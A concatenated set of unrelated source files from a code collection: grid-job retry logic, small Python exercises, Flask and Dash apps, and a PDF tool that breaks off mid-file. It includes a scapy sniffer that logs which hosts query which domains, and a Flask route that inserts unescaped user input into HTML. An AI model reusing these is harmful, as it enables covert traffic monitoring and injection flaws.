if self.ad.get("RemoveReason", "").startswith("Removed due to memory use"):
job_rss = int(self.ad.get("ResidentSetSize", "0")) // 1000
exitMsg = "Job killed by HTCondor due to excessive memory use"
exitMsg += " (RSS=%d MB)." % job_rss
exitMsg += " Will not retry it."
self.create_fake_fjr(exitMsg, 50660, 50660)
subreport = self.report
for attr in ['steps', 'cmsRun', 'performance', 'memory', 'PeakValueRss']:
subreport = subreport.get(attr, None)
if subreport is None:
return
total_job_memory = self.report['steps']['cmsRun']['performance']['memory']['PeakValueRss']
try:
total_job_memory = float(total_job_memory)
except ValueError:
return
if total_job_memory > self.MAX_MEMORY:
exitMsg = "Not retrying job due to excessive memory use (%d MB vs %d MB requested)" % (total_job_memory, self.MAX_MEMORY)
self.create_fake_fjr(exitMsg, 50660, 50660)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_disk_report(self):
"""
        This function checks 2 things:
        a) whether the remove reason is 'Removed due to disk usage', which is set by the
        PeriodicRemove expression (PeriodicRemove & PeriodicRemoveReason are set in
        DagmanCreator.py before task submission to the scheduler);
        b) whether the disk usage is >= the maximum allowed disk usage.
        If either evaluates to true, a fake fjr is created and the job is not retried.
"""
# If job was killed on the WN, we probably don't have a FJR.
if self.ad.get("RemoveReason", "").startswith("Removed due to disk usage"):
exitMsg = "Not retrying job due to excessive disk usage (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50662, 50662)
if 'DiskUsage' in self.ad:
diskUsage = int(self.ad['DiskUsage'])
if diskUsage >= self.MAX_DISK_SPACE:
self.logger.debug("Disk Usage: %s, Maximum allowed disk usage: %s", diskUsage, self.MAX_DISK_SPACE)
exitMsg = "Not retrying job due to excessive disk usage (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50662, 50662)
else:
msg = "Unable to get DiskUsage from job classads. Will not perform Disk Usage check."
self.logger.debug(msg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_expired_report(self):
"""
        If the job was removed because it stayed idle for more than a week, don't retry it.
"""
if self.ad.get("RemoveReason", "").startswith("Removed due to idle time limit"):
exitMsg = "Not retrying job due to excessive idle time (job automatically killed on the grid scheduler)"
self.create_fake_fjr(exitMsg, 50665, 50665)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_exit_code(self):
"""
Using the exit code saved in the json job report, decide whether it corresponds
to a recoverable or a fatal error.
"""
if 'exitCode' not in self.report:
msg = "'exitCode' key not found in job report."
self.logger.warning(msg)
return 1
try:
exitCode = int(self.report['exitCode'])
except ValueError:
msg = "Unable to extract job's wrapper exit code from job report."
self.logger.warning(msg)
return 1
exitMsg = self.report.get("exitMsg", "UNKNOWN")
if exitCode == 0:
msg = "Job and stageout wrappers finished successfully (exit code %d)." % (exitCode)
self.logger.info(msg)
return 0
msg = "Job or stageout wrapper finished with exit code %d." % (exitCode)
msg += " Trying to determine the meaning of the exit code and if it is a recoverable or fatal error."
self.logger.info(msg)
# Wrapper script sometimes returns the posix return code (8 bits).
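        # e.g. 8020 % 256 == 84, 8021 % 256 == 85, 8028 % 256 == 92, which is why both
        # the full and the truncated exit codes are matched below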
if exitCode in [8020, 8021, 8028] or exitCode in [84, 85, 92]:
try: # the following is still a bit experimental, make sure it never crashes the PJ
corruptedInputFile = self.check_corrupted_file(exitCode)
except Exception as e: # pylint: disable=broad-except
msg = f"check_corrupted_file raised an exception:\n{e}\nIgnore and go on"
self.logger.error(msg)
corruptedInputFile = False
if corruptedInputFile:
exitMsg = "Fatal Root Error maybe a corrupted input file. This error is being reported"
self.create_fake_fjr(exitMsg, 8022, 8022, fatalError=False) # retry the job
raise RecoverableError("Job failed to open local and fallback files.")
if exitCode == 1:
raise RecoverableError("Job failed to bootstrap CMSSW; likely a worker node issue.")
if exitCode == 50513 or exitCode == 81:
raise RecoverableError("Job did not find functioning CMSSW on worker node.")
# This is a difficult one -- right now CMSRunAnalysis.py will turn things like
# segfaults into an invalid FJR. Will revisit this decision later.
if exitCode == 50115 or exitCode == 195:
raise RecoverableError("Job did not produce a FJR; will retry.")
if exitCode == 134:
recoverable_signal = False
try:
fname = os.path.realpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
with open(fname, encoding='utf-8') as fd:
for line in fd:
if line.startswith("== CMSSW: A fatal system signal has occurred: illegal instruction"):
recoverable_signal = True
break
except Exception: # pylint: disable=broad-except
msg = "Error analyzing abort signal."
msg += "\nDetails follow:"
self.logger.exception(msg)
if recoverable_signal:
raise RecoverableError("SIGILL; may indicate a worker node issue.")
if exitCode == 8001 or exitCode == 65:
cvmfs_issue = False
try:
                fname = os.path.realpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
cvmfs_issue_re = re.compile("== CMSSW: unable to load /cvmfs/.*file too short")
with open(fname, encoding='utf-8') as fd:
for line in fd:
if cvmfs_issue_re.match(line):
cvmfs_issue = True
break
except Exception: # pylint: disable=broad-except
msg = "Error analyzing output for CVMFS issues."
msg += "\nDetails follow:"
self.logger.exception(msg)
if cvmfs_issue:
raise RecoverableError("CVMFS issue detected.")
# Another difficult case -- so far, SIGKILL has mostly been observed at T2_CH_CERN, and it has nothing to do
        # with an issue of the job itself. Typically this isn't the user code's fault;
        # it was often a site or pilot misconfiguration that led to the pilot exhausting its allocated runtime.
# We should revisit this issue if we see SIGKILL happening for other cases that are the users' fault.
if exitCode == 137:
raise RecoverableError("SIGKILL; likely an unrelated batch system kill.")
if exitCode == 10034 or exitCode == 50:
raise RecoverableError("Required application version not found at the site.")
if exitCode == 60403 or exitCode == 243:
raise RecoverableError("Timeout during attempted file stageout.")
if exitCode == 60307 or exitCode == 147:
raise RecoverableError("Error during attempted file stageout.")
if exitCode == 60311 or exitCode == 151:
raise RecoverableError("Error during attempted file stageout.")
if exitCode:
raise FatalError("Job wrapper finished with exit code %d.\nExit message:\n %s" % (exitCode, exitMsg.replace('\n', '\n ')))
return 0
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_corrupted_file(self, exitCode):
"""
        Check whether the job stdout contains a message indicating a corrupted input file,
        and report it via a json file <taskname>.job.<crabid>.<retry>.json.
        Returns True/False according to whether the file looks corrupted.
"""
if not os.path.exists('/etc/use_corruption_check'):
return False
corruptedFile = False
suspiciousFile = False
inputFileName = 'NotAvailable'
RSE = self.site
RSE = RSE if not RSE.startswith('T1') else f"{RSE}_Disk"
fname = os.path.realpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
self.logger.debug(f'exit code {exitCode}, look for corrupted file in {fname}')
with open(fname, encoding='utf-8') as fd:
for line in fd:
line = line.rstrip() # remove trailing new-line
# remember last opened file, in case of 8021 that's the one that matters
if line.startswith("== CMSSW:") and ' Successfully opened file' in line:
inputFileName = f"/store/{line.split('/store/')[1]}" # strip protocol part
if line.startswith("== CMSSW:") and "Fatal Root Error:" in line:
corruptedFile = True
self.logger.info("Corrupted input file found")
self.logger.debug(line)
errorLines = [line]
# file name is in next line
continue
if corruptedFile:
errorLines.append(line)
if '/store/' in line and '.root' in line:
# this may be better done in the script which processes the BadInputFiles reports
# if '/store/user' in line or '/store/group' in line and not 'rucio' in line:
# # no point in reporting files unknown to Rucio
# corruptedFile = False
# break
# extract the '/store/...root' part of this line
fragment1 = line.split('/store/')[1]
fragment2 = fragment1.split('.root')[0]
inputFileName = f"/store/{fragment2}.root"
self.logger.info(f"RSE: {RSE} - ec: {exitCode} - file: {inputFileName}")
else:
corruptedFile = False
suspiciousFile = True
errorLines.append('NOT CLEARLY CORRUPTED, OTHER ROOT ERROR ?')
                        errorLines.append('DID identification may not be correct')
self.logger.info("RootFatalError does not contain file info")
break
if corruptedFile or suspiciousFile:
# add pointers to logs
schedHostname = socket.gethostname().split('.')[0]
            schedId = schedHostname.split('0')[1] # vocms059 --> 59, vocms0144 --> 144, etc.
username = self.reqname.split(':')[1].split('_')[0]
webDirUrl = f"https://cmsweb.cern.ch:8443/scheddmon/0{schedId}/{username}/{self.reqname}"
stdoutUrl = f"{webDirUrl}/job_out.{self.job_id}.{self.crab_retry}.txt"
postJobUrl = f"{webDirUrl}/postjob.{self.job_id}.{self.crab_retry}.txt"
errorLines.append(f"stdout: {stdoutUrl}")
errorLines.append(f"postjob: {postJobUrl}")
# note things down
reportFileName = f'{self.reqname}.job.{self.job_id}.{self.crab_retry}.json'
corruptionMessage = {'DID': f'cms:{inputFileName}', 'RSE': RSE,
'exitCode': exitCode, 'message': errorLines}
with open(reportFileName, 'w', encoding='utf-8') as fp:
json.dump(corruptionMessage, fp)
self.logger.info('corruption message prepared, gfal-copy to EOS')
proxy = os.getenv('X509_USER_PROXY')
self.logger.info(f"X509_USER_PROXY = {proxy}")
if corruptedFile:
reportLocation = 'gsiftp://eoscmsftp.cern.ch/eos/cms/store/temp/user/BadInputFiles/corrupted/new/'
if suspiciousFile:
reportLocation = 'gsiftp://eoscmsftp.cern.ch/eos/cms/store/temp/user/BadInputFiles/suspicious/new/'
destination = reportLocation + reportFileName
cmd = f'gfal-copy -v -t 60 {reportFileName} {destination}'
out, err, ec = executeCommand(cmd)
if ec:
self.logger.error(f'gfal-copy failed with out: {out} err: {err}')
return corruptedFile
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_empty_report(self):
"""
        Raise a RecoverableError if the job produced no usable framework job report.
"""
if not self.report or not self.validreport:
raise RecoverableError("Job did not produce a usable framework job report.")
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def execute_internal(self, logger, reqname, username, job_return_code, dag_retry, crab_retry, job_id, dag_jobid, job_ad, used_job_ad):
"""
        Evaluate the ads and report of a finished job and decide its fate: returns
        JOB_RETURN_CODES.OK on success, otherwise raises RecoverableError or FatalError.
"""
self.logger = logger
self.reqname = reqname
self.username = username
self.job_return_code = job_return_code
self.dag_retry = dag_retry
self.crab_retry = crab_retry
self.job_id = job_id
self.dag_jobid = dag_jobid
try:
self.dag_clusterid = int(self.dag_jobid.split(".")[0])
except ValueError:
pass
if used_job_ad:
# We can determine walltime and max memory from job ad.
self.ad = job_ad
if 'MaxWallTimeMinsRun' in self.ad:
self.MAX_WALLTIME = int(self.ad['MaxWallTimeMinsRun']) * 60
else:
msg = "Unable to get MaxWallTimeMinsRun from job classads. Using the default MAX_WALLTIME."
self.logger.debug(msg)
if 'RequestMemory' in self.ad:
self.MAX_MEMORY = int(self.ad['RequestMemory'])
else:
msg = "Unable to get RequestMemory from job classads. Using the default MAX_MEMORY."
self.logger.debug(msg)
msg = "Job ads already present. Will not use condor_q, but will load previous jobs ads."
self.logger.debug(msg)
self.get_job_ad_from_file()
else:
msg = "Will use condor_q command to get finished job ads from job_log."
self.logger.debug(msg)
self.get_job_ad_from_condor_q()
# Do we still need identification of site in self.get_report()?
# We can always get it from job ad.
if 'JOBGLIDEIN_CMSSite' in self.ad:
self.site = self.ad['JOBGLIDEIN_CMSSite']
self.get_report()
if self.ad.get("RemoveReason", "").startswith("Removed due to job being held"):
hold_reason = self.ad.get("HoldReason", self.ad.get("LastHoldReason", "Unknown"))
raise RecoverableError("Will retry held job; last hold reason: %s" % (hold_reason))
try:
self.check_empty_report()
# Raises a RecoverableError or FatalError exception depending on the exitCode
# saved in the job report.
check_exit_code_retval = self.check_exit_code()
except RecoverableError as e:
orig_msg = str(e)
try:
self.check_memory_report()
self.check_cpu_report()
self.check_disk_report()
self.check_expired_report()
except Exception: # pylint: disable=broad-except
msg = "Original error: %s" % (orig_msg)
self.logger.error(msg)
raise
raise
# The fact that check_exit_code() has not raised RecoverableError or FatalError
# doesn't necessarily mean that the job was successful; check_exit_code() reads
# the job exit code from the job report and it might be that the exit code is
# not there, in which case check_exit_code() returns silently. So as a safety
# measure we check here the job return code passed to the post-job via the
# DAGMan $RETURN argument macro. This is equal to the return code of the job
# when the job was executed, and is equal to -100[1,2,3,4] when ["job failed to
# be submitted to the batch system", "job externally removed from the batch
# system queue", "error in the job log monitor", "job not executed because PRE
# script returned non-zero"] respectively. In the particular case of job return
# code = -1004 and job exit code from (previous job retry) job report = 0, we
# should continue and not do the check. The reason is: the pre-job is not
# expected to fail; if the pre-job returned non-zero we assume it was done so
# in order to intentionally skip the job execution.
if not (self.job_return_code == -1004 and check_exit_code_retval == 0):
if self.job_return_code != JOB_RETURN_CODES.OK: # Probably means stageout failed!
msg = "Payload job was successful, but wrapper exited with non-zero status %d" % (self.job_return_code)
if self.job_return_code > 0:
msg += " (stageout failure)?"
raise RecoverableError(msg)
return JOB_RETURN_CODES.OK
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def execute(self, *args, **kw):
"""
        Run execute_internal, translating RecoverableError/FatalError into the
        corresponding JOB_RETURN_CODES value and recording per-site statistics.
"""
try:
job_status = self.execute_internal(*args, **kw)
self.record_site(job_status)
return job_status
except RecoverableError as e:
self.logger.error(str(e))
self.record_site(JOB_RETURN_CODES.RECOVERABLE_ERROR)
return JOB_RETURN_CODES.RECOVERABLE_ERROR
except FatalError as e:
self.logger.error(str(e))
self.record_site(JOB_RETURN_CODES.FATAL_ERROR)
return JOB_RETURN_CODES.FATAL_ERROR
except Exception as e: # pylint: disable=broad-except
self.logger.exception(str(e))
return 0 # Why do we return 0 here ?
| dmwm/CRABServer | src/python/TaskWorker/Actions/RetryJob.py | RetryJob.py | py | 27,933 | python | en | code | 15 | github-code | 13 |
33014996909 | import random
def run():
num_aleatorio = random.randint(1, 100)
    num_elegido = int(input('Pick a number at random: '))
    while num_elegido != num_aleatorio:
        if num_elegido < num_aleatorio:
            print('Look for a higher number')
        else:
            print('Look for a lower number')
        num_elegido = int(input('Pick another number: '))
    print('You won!')
if __name__ == '__main__':
run()
| devpcastello/P-DS-Coins_Converter | adivina_el_numero.py | adivina_el_numero.py | py | 446 | python | es | code | 0 | github-code | 13 |
30241116 | from entities.key_data_processing.search_response import SearchResponse
from extractors.value_finding_status import ValueFindingStatus
from entities.key_data_processing.key_data import KeyData
class KeyDataParser:
def __init__(self, search_responses: list[SearchResponse]):
self.__search_responses = search_responses
def parse_key_data(self) -> KeyData:
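        # Map each key_word to its extracted value when the response status is
        # FOUND, and to None for any other status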
key_data = dict()
for key_response in self.__search_responses:
if key_response.status == ValueFindingStatus.FOUND:
key_data[key_response.key_word] = key_response.value
else:
key_data[key_response.key_word] = None
return KeyData(key_data)
| AdrianC2000/InvoiceScannerApp | parsers/key_data_parser.py | key_data_parser.py | py | 692 | python | en | code | 0 | github-code | 13 |
11619097367 | #Nykaa
#User will provide a list of items they want to buy : "Lipstick", "Lip Balm", "Eyeliner", "Deo"
#Build a logic:
## If an item is in the male list : assume price as 60, give 10% off
## If an item is in the female list : assume price as 100, give 20% off
## If an item is in the unisex list : assume price as 120, give 5% off
## Calculate the total bill, ask for a coupon (otherwise assume the default coupon NYKAAIPO22), and give 10% off if the bill > 500, otherwise don't
male = ["Beard Oil", "Trimmer", "Men Facewash", "Men Soap"]
female = ["Eyeliner", "Lipstick", "Lipbalm", "ColdCream"]
unisex = ["Deo", "Soap", "Perfume", "Sanitizer", "Shampoo"]
def bill_to_pay(bill, coupon="NYKAAIPO22"):
    # Per the spec above: the coupon gives 10% off only when the bill exceeds 500
    if bill > 500 and coupon == "NYKAAIPO22":
        bill = bill - bill * 0.1
    return bill
def bill_calculator(items):
total_bill = 0
print(items)
for item in items:
print(item)
if item in male:
price = 60
discount = 0.1 * price
bill = price - discount
elif item in female:
price = 100
discount= 0.2 * price
bill = price - discount
elif item in unisex:
price = 120
discount = 0.05 * price
bill = price - discount
total_bill +=bill
total_bill = bill_to_pay(total_bill)
print(f"your total bill is: {total_bill}")
bill_calculator(["Deo","Soap"])
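# With the prices above, ["Deo", "Soap"] are both unisex: 2 * (120 - 5% of 120) = 228,
# which is below the 500 threshold, so the coupon discount does not apply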
| myselfparag/python-programming | functions/option_argument_hm.py | option_argument_hm.py | py | 1,473 | python | en | code | 0 | github-code | 13 |
1589545432 | import re
input_content = str(input("Enter the name and mobile number, separated by a space: "))
# Regex template for matching Chinese characters (extracts the name)
chinese_pat = re.compile(r"[\u4e00-\u9fa5]+")
# Regex template for validating a Chinese mainland mobile number
mobile_pat = re.compile(r"^(13\d|14[57]|15\d|166|17\d|18\d)\d{8}$")
phone_name = "".join(re.findall(chinese_pat, input_content))
phone_num = "".join(re.findall(r"\d+", input_content))
if re.search(mobile_pat, phone_num):
print(phone_num)
else:
    print("Invalid mobile phone number")
print(phone_name, end="\n")
| Abeautifulsnow/python_learning | scripts/python/re_mobile.py | re_mobile.py | py | 521 | python | zh | code | 0 | github-code | 13 |
70956260178 | from PyQt5.QtWidgets import QWidget, QHBoxLayout
from widgets.Map.Toolbox.Button import Button
from widgets.Map.MapMode import MapMode
class ToolboxWidget(QWidget):
def __init__(self, parent):
super(ToolboxWidget, self).__init__(parent)
self.__parent = parent
self.setGeometry(40, 0, 150, 50)
self.setLayout(QHBoxLayout())
self.layout().setContentsMargins(0, 0, 0, 0)
self.layout().setSpacing(0)
moveBtn = Button("arrows-alt.svg",
MapMode.MOVE_ITEMS,
parent.modeObserver())
rotateBtn = Button("sync-alt.svg",
MapMode.ROTATE_ITEMS,
parent.modeObserver())
createBtn = Button("table.svg",
MapMode.CREATE_ITEMS,
parent.modeObserver())
moveBtn.clicked.connect(self.moveButtonCallback)
rotateBtn.clicked.connect(self.rotateButtonCallback)
createBtn.clicked.connect(self.createButtonCallback)
self.layout().addWidget(moveBtn)
self.layout().addWidget(rotateBtn)
self.layout().addWidget(createBtn)
def moveButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.MOVE_ITEMS)
def rotateButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.ROTATE_ITEMS)
def createButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.CREATE_ITEMS)
| GeorgeHulpoi/piu-restaurant-management | widgets/Map/Toolbox/ToolboxWidget.py | ToolboxWidget.py | py | 1,559 | python | en | code | 0 | github-code | 13 |
46804889164 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from os import system
from optparse import OptionParser
# scapy supplies the packet layers referenced in process() below, plus sniff()
from scapy.all import IP, IPv6, UDP, DNS, DNSQR, sniff
queries_liste = {}
quiet = False
databaseConn = None
databaseCursor = None
def process(pkt):
global quiet
global databaseConn
ip46 = IPv6 if IPv6 in pkt else IP
if pkt.haslayer(DNSQR) and UDP in pkt and pkt[UDP].sport == 53 and ip46 in pkt:
# pkt[IP].dst == IP source of the DNS request
# pkt[IP].src == IP of the DNS server
# pkt[DNS].qd.qname == DNS name
query = pkt[DNS].qd.qname.decode("utf-8") if pkt[DNS].qd != None else "?"
if not pkt[ip46].dst in queries_liste:
queries_liste[pkt[ip46].dst] = {}
if not pkt[ip46].src in queries_liste[pkt[ip46].dst]:
queries_liste[pkt[ip46].dst][pkt[ip46].src] = {}
if not query in queries_liste[pkt[ip46].dst][pkt[ip46].src]:
queries_liste[pkt[ip46].dst][pkt[ip46].src][query] = 1
else:
queries_liste[pkt[ip46].dst][pkt[ip46].src][query] += 1
if databaseConn and query != None and query != "?":
databaseCursor.execute("INSERT OR IGNORE INTO domains (domain) VALUES (?);", (query,))
databaseConn.commit()
databaseCursor.execute("SELECT idDomain FROM domains WHERE domain=?;", (query,))
domainId = databaseCursor.fetchone()[0]
databaseCursor.execute("SELECT count, idWhoAsk FROM whoAsk WHERE ipFrom=? AND ipTo=? AND domainId=?;", (pkt[ip46].src, pkt[ip46].dst, domainId))
whoAsk = databaseCursor.fetchone()
if whoAsk:
databaseCursor.execute("UPDATE whoAsk SET count=? WHERE idWhoAsk=?",(whoAsk[0]+1 if whoAsk[0] else 2, whoAsk[1]))
else:
databaseCursor.execute("INSERT INTO whoAsk (ipFrom, ipTo, domainId, count) VALUES (?,?,?,1);", (pkt[ip46].src, pkt[ip46].dst, domainId))
databaseConn.commit()
if not quiet:
system('clear')
print("{:15s} | {:15s} | {:15s} | {}".format("IP source", "DNS server", "Count DNS request", "Query"))
for ip in queries_liste:
print("{:15s}".format(ip)) # IP source
for query_server in queries_liste[ip]:
print(" "*18+"{:15s}".format(query_server)) # IP of DNS server
for query in queries_liste[ip][query_server]:
print(" "*36+"{:19s} {}".format(str(queries_liste[ip][query_server][query]),query)) # Count DNS request | DNS
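# Minimal usage sketch (hypothetical; the original script defines process() but
# never starts a capture): attach the callback to live DNS traffic with sniff().
if __name__ == "__main__":
    # Only DNS over UDP; store=0 keeps memory bounded during long captures
    sniff(filter="udp port 53", prn=process, store=0)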
| solka-git/git-sample | dns_sniffer.py | dns_sniffer.py | py | 2,217 | python | en | code | 0 | github-code | 13 |
26944164640 | #!/bin/python3
from flask import Flask, request, Response
import requests, urllib.parse
from bs4 import BeautifulSoup
from markupsafe import escape
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from PIL import Image
import io
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello, CDK classroom!'
@app.route('/saludo/<persona>')
def saludoDinamico(persona):
    return 'Hello %s, welcome!!' % persona
@app.route('/cuadrado/<float:num>')
def calculaCuadrado(num):
resp = num * num
    return 'Answer: %f' % resp
@app.route('/curso', methods=['POST', 'GET'])
def webScrap():
    textReturn = "Method not accepted"
if request.method == 'POST':
data = request.get_json()
try:
busqueda = data['busqueda']
            textReturn = "<p>Your search term is: <em>" + busqueda + "</em></p><ul>"
busquedaText = busqueda.lower()
busqueda = urllib.parse.quote(busqueda)
page = requests.get('https://www.tecgurus.net/cursos?busqueda=' + busqueda)
# Create a BeautifulSoup object
soup = BeautifulSoup(page.text, 'html.parser')
cursos_list = soup.find(class_='right-service-box')
# Pull text from all instances of <a> tag within BodyText div
cursos_items = cursos_list.find_all('img')
for curso in cursos_items:
                tituloCurso = curso.get('alt')
if tituloCurso.lower().find(busquedaText) != -1:
textReturn += "<li>" + curso.get('alt') + "</li>"
textReturn +='</ul>'
except:
            textReturn = "An error occurred while processing"
return textReturn
@app.route('/audiosaludo/<msgText>')
def audiotext(msgText):
saludohtml = "<audio controls autoplay> <source src='https://code.responsivevoice.org/getvoice.php?text=%s&lang=es-MX&engine=g1&name=&pitch=0.5&rate=0.5&volume=1&key=uu8DEkxz&gender=female' type='audio/mpeg'> </audio>" % msgText
return saludohtml
@app.route('/convertir', methods=['POST', 'GET'])
def cambio_base():
data = request.get_json()
decimal = int(data['decimal'])
base = int(data['base'])
conversion = ''
while decimal // base != 0:
conversion = str(decimal % base) + conversion
decimal = decimal // base
return str(decimal) + conversion
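# e.g. {"decimal": 10, "base": 2} -> "1010": remainders are emitted least-significant
# first and prepended, and the final quotient supplies the leading digit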
#### Plotting procedure ####
@app.route('/grafica.png', methods=['POST', 'GET'])
def plot_png():
if request.method == 'POST':
data = request.get_json()
print(data)
if data['tipo'] == 'pie':
fig = pie(data)
elif data['tipo'] == 'bar':
fig = bar(data)
else:
fig = line(data)
output = io.BytesIO()
FigureCanvas(fig).print_png(output)
return Response(output.getvalue(), mimetype='image/png')
else:
        return "GET requests are not valid"
def bar(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
#data = {'apples': 10, 'oranges': 15, 'lemons': 5, 'limes': 20}
#names = list(data.keys())
#values = list(data.values())
axis.bar(datos['nombres'], datos['valores'])
return fig
def pie(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
axis.pie(datos['valores'], labels=datos['nombres'], autopct='%1.1f%%',
shadow=True, startangle=90)
axis.axis('equal')
return fig
def line(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
axis.plot(datos['nombres'], datos['valores'])
return fig
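# Example request body for POST /grafica.png (hypothetical values):
# {"tipo": "pie", "nombres": ["a", "b"], "valores": [30, 70]}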
###########
@app.route('/evidencia', methods=['POST', 'GET'])
def consumo():
if request.method == 'POST':
data = request.get_json()
print(data)
imagen = Image.open('./comida.jpg')
imagen.show()
        return "<b>Sent: title </b> %s" % data['titulo'] + ", <b> description: </b> %s " % data['descripcion'] + " <b> calories: </b> %i" % data['caloria'] + " <b> date: </b> %s" % data['fecha']
else:
        return "Method not allowed"
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
| SusanaCoronaC/CDK | src/webService.py | webService.py | py | 4,270 | python | en | code | 0 | github-code | 13 |
21996192094 | import pandas as pd
import dash
from dash import html, dcc, Input, Output
import plotly.express as px
# Read the data
spacex_df = pd.read_csv("spacex_launch_dash.csv")
max_payload = spacex_df['Payload Mass (kg)'].max()
min_payload = spacex_df['Payload Mass (kg)'].min()
# Create a dash application
app = dash.Dash(__name__)
# Dropdown options for the Launch Site
launch_sites = spacex_df['Launch Site'].unique().tolist()
dropdown_options = [{'label': 'All Sites', 'value': 'ALL'}] + \
[{'label': site, 'value': site} for site in launch_sites]
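# e.g. [{'label': 'All Sites', 'value': 'ALL'}, {'label': 'CCAFS LC-40', 'value': 'CCAFS LC-40'}, ...]
# (the concrete site labels depend on the CSV contents)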
app.layout = html.Div([
html.H1('SpaceX Launch Records Dashboard', style={'textAlign': 'center', 'color': '#503D36', 'font-size': 40}),
# Task 1: Add a Dropdown List for Launch Site Selection
dcc.Dropdown(id='site-dropdown', options=dropdown_options, value='ALL', placeholder="Select a Launch Site"),
html.Br(),
# Task 2: Pie Chart Display (Callback defined below)
dcc.Graph(id='success-pie-chart'),
html.Br(),
html.P("Payload range (Kg):"),
# Task 3: Add a Payload Range Slider
dcc.RangeSlider(id='payload-slider', min=min_payload, max=max_payload,
value=[min_payload, max_payload],
                    marks={i: str(i) for i in range(0, int(max_payload) + 1000, 1000)},
step=1000),
html.Div(dcc.Graph(id='success-payload-scatter-chart')),
])
# Task 2: Pie Chart Callback
@app.callback(
Output('success-pie-chart', 'figure'),
[Input('site-dropdown', 'value')]
)
def update_pie_chart(selected_site):
if selected_site == 'ALL':
filtered_df = spacex_df
        fig = px.pie(filtered_df, values='class', names='Launch Site', title='Total Success Launches by Site')
else:
filtered_df = spacex_df[spacex_df['Launch Site'] == selected_site]
fig = px.pie(filtered_df, names='class', title=f'Total Success Launches for site {selected_site}')
return fig
# Task 4: Scatter Chart Callback
@app.callback(
Output('success-payload-scatter-chart', 'figure'),
[Input('site-dropdown', 'value'), Input('payload-slider', 'value')]
)
def update_scatter_chart(selected_site, payload_range):
low, high = payload_range
filtered_df = spacex_df[(spacex_df['Payload Mass (kg)'] >= low) & (spacex_df['Payload Mass (kg)'] <= high)]
if selected_site != 'ALL':
filtered_df = filtered_df[filtered_df['Launch Site'] == selected_site]
fig = px.scatter(filtered_df, x='Payload Mass (kg)', y='class', color='Booster Version Category',
title='Correlation between Payload and Success for all Sites' if selected_site == 'ALL' else f'Correlation between Payload and Success for {selected_site}')
return fig
# Run the app
if __name__ == '__main__':
app.run_server()
| AbdullaOmarA/IBM-Data-Science-Professional | Applied Data Science Capstone/7.SpaceX Interactive Dashboard with Ploty Dash.py | 7.SpaceX Interactive Dashboard with Ploty Dash.py | py | 2,841 | python | en | code | 0 | github-code | 13 |
27659365618 | import sys
from pypdf import PdfReader, PdfWriter
from argparse import ArgumentParser
from pdftool.compress import compress_page
from pdftool.remove_images import remove_images
from pdftool.encryption import encrypt, decrypt
from pdftool.merge import merge
from pdftool.split import range_to_page_indices
from pdftool.search import search
from pdftool.rotate import rotate
import os
parser = ArgumentParser(description=__doc__)
def main(args=sys.argv[1:]) -> int:
parser.add_argument("input_pdf_name", help="The name of the input PDF file")
parser.add_argument(
"-o", "--output",
dest="output_pdf_name",
help="The name for the PDF output file",
required=False,
)
parser.add_argument(
"-c", "--compress",
dest="should_compress",
action="store_true"
)
parser.add_argument(
"-ri", "--remove_images",
dest="should_remove_images",
action="store_true"
)
parser.add_argument(
"-e", "--encrypt",
dest="encrypt_key",
help="The key to be used to encrypt the PDF file",
required=False,
)
parser.add_argument(
"-d", "--decrypt",
dest="decrypt_key",
help="The key to be used to decrypt the PDF file",
required=False,
)
parser.add_argument(
"-m", "--merge",
dest="merge_file",
help='''The name of a file to be merged into the input file in the format FILE_NAME:POSITION:PAGES, POSITION can be excluded or set to -1 to append to the end, specific PAGES can be specified (e.g. 1,2,6-10)''',
nargs="+",
action="append",
required=False,
)
parser.add_argument(
"-rot", "--rotate",
dest="rotate_pages",
help="Rotates the given range of pages by the angle in the formate RANGE:ANGLE (e.g. 1,2,4-5:90), positive for clockwise negative for counter-clockwise",
nargs="+",
action="append",
required=False,
)
parser.add_argument(
"-s", "--search",
dest="search_term",
help="should search the given text and return the sentences",
required=False,
)
parser.add_argument(
"-p", "--pages",
dest="pages",
help="Extract pages (e.g. '2,3-6')",
required=False,
)
parser.add_argument(
"-r", "--remove",
dest="remove_pages",
help="Remove pages (e.g. '2,3-6')",
required=False,
)
input_parameters, _unknown_input_parameters = parser.parse_known_args(args)
name = input_parameters.input_pdf_name
    output_name = name + "-output"
if input_parameters.output_pdf_name:
output_name = input_parameters.output_pdf_name
should_compress = False
if input_parameters.should_compress:
should_compress = input_parameters.should_compress
if should_compress is True:
print("- Compression Enabled")
should_remove_images = False
if input_parameters.should_remove_images:
should_remove_images = input_parameters.should_remove_images
if should_remove_images is True:
print("- Remove Images Enabled")
encryption_key = ""
should_encrypt = False
if input_parameters.encrypt_key:
encryption_key = input_parameters.encrypt_key
should_encrypt = True
print("- Encrypting with key: {}".format(encryption_key))
decryption_key = ""
should_decrypt = False
if input_parameters.decrypt_key:
decryption_key = input_parameters.decrypt_key
should_decrypt = True
print("- Decryptying with key: {}".format(decryption_key))
merge_files = []
if input_parameters.merge_file:
for file in input_parameters.merge_file:
x = file[0].split(':')
file_name = x[0]
if not file_name.endswith(".pdf"):
